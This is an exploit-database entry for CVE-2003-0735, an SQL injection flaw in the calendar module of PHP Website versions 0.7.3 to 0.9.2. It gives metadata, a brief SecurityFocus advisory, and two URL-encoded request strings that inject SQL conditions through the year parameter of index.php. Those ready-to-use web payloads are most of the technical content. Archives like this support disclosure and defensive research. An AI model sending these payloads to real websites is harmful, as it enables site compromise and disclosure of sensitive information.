EXPLOITS

PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection

Author: Lorenzo Hernandez Garcia-Hierro
type: webapps
platform: php
port: 
date_added: 2003-08-11  
date_updated: 2012-11-29  
verified: 1  
codes: CVE-2003-0735;OSVDB-2410  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23013.txt  

source: https://www.securityfocus.com/bid/8390/info

Multiple SQL injection vulnerabilities have been reported in PHP Website. These issue may be exploited by sending a malicious request to the calendar script. Possible consequencs of exploitation include compromise of the site and disclosure of sensitive information.

http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=

http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1